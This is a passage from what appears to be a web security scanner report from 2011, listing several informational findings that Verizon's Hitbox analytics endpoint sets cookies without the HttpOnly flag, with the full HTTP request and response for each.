DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz%"%X%QBe%CQrz%X%QBe%CQr"%X%QBe%CQ%"%X%QBe%CQr%%r^iQ"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:24:11 GMT; max-age=31536000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM560905OCSM&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrzB"%X%QBe%%%Xz%X%QBe%%%X"%X%QBe%%%Q"%X%QBe%%%Xrirr%r"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCri"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzXi^"%X%QBer^Xez%X%QBer^Xe"%X%QBe%XBQ"%X%QBer^Xer@rQe@"Xz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315261325

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:24:11 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzQ%Q"%X%QBer^Xez%X%QBer^Xe"%X%QBe%CQ%"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:24:11 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:24:11 GMT; max-age=31536000
Set-Cookie: CTG=1315261451; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:24:11 GMT; max-age=604800
Set-Cookie: DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz%"%X%QBe%CQrz%X%QBe%CQr"%X%QBe%CQ%"%X%QBe%CQr%%r^iQ"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:24:11 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:24:12 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.31. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%@@"%X%QBer^Xez%X%QBer^Xe"%X%QBe%%%X"%X%QBer^Xer@rQe@"eBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:18:33 GMT; max-age=31536000
WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:18:33 GMT; max-age=31536000
DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrzr"%X%QBe%%%Xz%X%QBe%%%X"%X%QBe%%%X"%X%QBe%%%Xrirr%r"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:18:33 GMT; max-age=31536000
CTG=1315261113; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:18:33 GMT; max-age=604800

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM560507I8NC&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%%Q"%X%QBer^Xez%X%QBer^Xe"%X%QBe%rQ%"%X%QBer^Xer@rQe@"@%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315261051

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:33 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%@@"%X%QBer^Xez%X%QBer^Xe"%X%QBe%%%X"%X%QBer^Xer@rQe@"eBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:18:33 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:18:33 GMT; max-age=31536000
Set-Cookie: DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrzr"%X%QBe%%%Xz%X%QBe%%%X"%X%QBe%%%X"%X%QBe%%%Xrirr%r"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:18:33 GMT; max-age=31536000
Set-Cookie: CTG=1315261113; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:18:33 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:18:34 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.32. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM56050762VVV6=V1rrrrr"rz%X%QBeBQCCr^riB^z%zrz%"%X%QBeBQCCz%X%QBeBQCC"%X%QBeBQCQ"%X%QBeBQCCr^riB^"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6CzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:25 GMT; max-age=31536000
DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%er^"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQCQ"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:25 GMT; max-age=31536000
WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:42:25 GMT; max-age=31536000
CTG=1315262545; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:42:25 GMT; max-age=604800

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM56050762VV&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://promo.verizon.com/omk/online.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrz%BC^"%X%QBe%%%Xz%X%QBe%%%X"%X%QBeBXeB"%X%QBe%%%Xrirr%r"QCz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz^C@"%X%QBe%CQrz%X%QBe%CQr"%X%QBeBX^@"%X%QBe%CQr%%r^iQ"@i@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrz%BBC"%X%QBe%Xrez%X%QBe%Xre"%X%QBeBQXr"%X%QBe%XrerCrCri"%BBCz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%Q^C"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQXr"%X%QBer^Xer@rQe@"%XXz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrzr"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQXr"%X%QBeBQXr@Cre%e"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315262530

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:25 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM56050762VVV6=V1rrrrr"rz%X%QBeBQCCr^riB^z%zrz%"%X%QBeBQCCz%X%QBeBQCC"%X%QBeBQCQ"%X%QBeBQCCr^riB^"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6CzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:25 GMT; max-age=31536000
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%er^"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQCQ"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:25 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:42:25 GMT; max-age=31536000
Set-Cookie: CTG=1315262545; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:42:25 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:42:26 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.33. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM550928B8DMV6=V1rrrrr"rz%X%QBeriBrrir%@iz%zrz%XXC"%X%QBeriBrz%X%QBeriBr"%X%QBeB%QC"%X%QBeriBrrir%@i"%%^z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWaA6qU6O:ma6uDF2TaFF6W~:uI~HO:maHGIWaA6qU6O:ma6haF2_aTf2I~6W~:uI~HO:maHGIWa6OF2G:avBA6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6haF2_aTf2I~Oa~G62OIG:GDG6%BQe%B|OfmA6qU6haF2_aTf2I~6FDGG:hf6fq_QcBBA6FaIhcO6~6~6GIWa%A6FmuG:hfI~6:qahq2akvmI2TvDTIDfO6:qahq2akvmI2TvDTIDfOzOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:35:54 GMT; max-age=31536000
WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:35:54 GMT; max-age=31536000
CTG=1315262154; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:35:54 GMT; max-age=604800
DM560905J1NCV6=V1rrrrr"rz%X%QBeB%QCrerCQez%zrzr"%X%QBeB%QCz%X%QBeB%QC"%X%QBeB%QC"%X%QBeB%QCrerCQe"rz(xB$FmuG:hfI~xB$:qahq2akxQ$mI2TxQ$DTIDfOxB$:qahq2akxQ$mI2TxQ$DTIDfOz7}z)OuKr6%XzA6FmuG:hfI~6:qahq2akvmI2TvDTIDfO6:qahq2akvmI2TvDTIDfOzOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:35:54 GMT; max-age=31536000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM560905J1NC%3BDM550928B8DM&cd=1&hv=6&n=/overview_main_unauth&con=&vcon=/smbportal/overview_main_unauth&tt=auto&ja=y&dt=22&zo=300&lm=1315280153000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=Windows%20NT%206.1&vpc=HBX0250u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pu=&pl=Mozilla%20Default%20Plug-in%3AGoogle%20Update%3AiTunes%20Application%20Detector%3AGoogle%20Earth%20Plugin%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3ASilverlight%20Plug-In%3AMicrosoft%20Office%202010%3AMicrosoft%20Office%202010%3AWPI%20Detector%201.4%3AGoogle%20Updater%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3A&lv.id=&lv.pos=&hid=0.9416435859353576 HTTP/1.1
Host: ehg-verizon.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: CTG=1315262035; DM550928B8DMV6=V1rrrrr"rz%X%QBeriBrrir%@iz%zrz%B%Q"%X%QBeriBrz%X%QBeriBr"%X%QBeBrXQ"%X%QBeriBrrir%@i"%%iz(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWaA6qU6O:ma6uDF2TaFF6W~:uI~HO:maHGIWaA6qU6O:ma6haF2_aTf2I~6W~:uI~HO:maHGIWa6OF2G:avBA6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6haF2_aTf2I~Oa~G62OIG:GDG6%BQe%B|OfmA6qU6haF2_aTf2I~6FDGG:hf6fq_QcBBA6FaIhcO6~6~6GIWa%zOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; DM560507CPCFV6=V1eB(#X"rz%X%QBeriBrrir%@iz%zrzQe"%X%QBeriBrz%X%QBeriBr"%X%QBeri@e"%X%QBeriBrrir%@i"%z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWaA6qU6O:ma6uDF2TaFF6W~:uI~HO:maHGIWaA6qU6O:ma6haF2_aTf2I~6W~:uI~HO:maHGIWa6OF2G:avBzOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; WSS_GW=V1z%X%QBeriBr; DM560905OCSMV6=V1rrrrr"rz%X%QBe%ee^errBC@z%zrzBCi"%X%QBe%ee^z%X%QBe%ee^"%X%QBe%^%@"%X%QBe%ee^errBC@"B%z(xB$qUxB$haF2_aTf2I~xB$FDGG:hfxB$haF2_aTf2I~Oa~GxB$72:FfqxB$%rrX^%xB$72:Ffqz7}z)OuKr6BizA6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6haF2_aTf2I~Oa~G62OIG:GDG6%BQe%B|OfmA6qU6haF2_aTf2I~6FDGG:hf6fq_QcBBzOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:54 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBeriBrrir%@iz%zrz%XXC"%X%QBeriBrz%X%QBeriBr"%X%QBeB%QC"%X%QBeriBrrir%@i"%%^z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWaA6qU6O:ma6uDF2TaFF6W~:uI~HO:maHGIWaA6qU6O:ma6haF2_aTf2I~6W~:uI~HO:maHGIWa6OF2G:avBA6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6haF2_aTf2I~Oa~G62OIG:GDG6%BQe%B|OfmA6qU6haF2_aTf2I~6FDGG:hf6fq_QcBBA6FaIhcO6~6~6GIWa%A6FmuG:hfI~6:qahq2akvmI2TvDTIDfO6:qahq2akvmI2TvDTIDfOzOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:35:54 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:35:54 GMT; max-age=31536000
Set-Cookie: CTG=1315262154; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:35:54 GMT; max-age=604800
Set-Cookie: DM560905J1NCV6=V1rrrrr"rz%X%QBeB%QCrerCQez%zrzr"%X%QBeB%QCz%X%QBeB%QC"%X%QBeB%QC"%X%QBeB%QCrerCQe"rz(xB$FmuG:hfI~xB$:qahq2akxQ$mI2TxQ$DTIDfOxB$:qahq2akxQ$mI2TxQ$DTIDfOz7}z)OuKr6%XzA6FmuG:hfI~6:qahq2akvmI2TvDTIDfO6:qahq2akvmI2TvDTIDfOzOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:35:54 GMT; max-age=31536000
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:35:55 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.34. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzB"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XB@"%X%QBe%XBQrBrCBX"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:22:07 GMT; max-age=31536000
DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzX^%"%X%QBer^Xez%X%QBer^Xe"%X%QBe%XB@"%X%QBer^Xer@rQe@"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:22:07 GMT; max-age=31536000
WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:22:07 GMT; max-age=31536000
CTG=1315261327; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:22:07 GMT; max-age=604800

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM5605079NES&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrzB"%X%QBe%%%Xz%X%QBe%%%X"%X%QBe%%%Q"%X%QBe%%%Xrirr%r"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCri"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzXie"%X%QBer^Xez%X%QBer^Xe"%X%QBe%XBB"%X%QBer^Xer@rQe@"%ez(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315261322

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:22:07 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzB"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XB@"%X%QBe%XBQrBrCBX"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:22:07 GMT; max-age=31536000
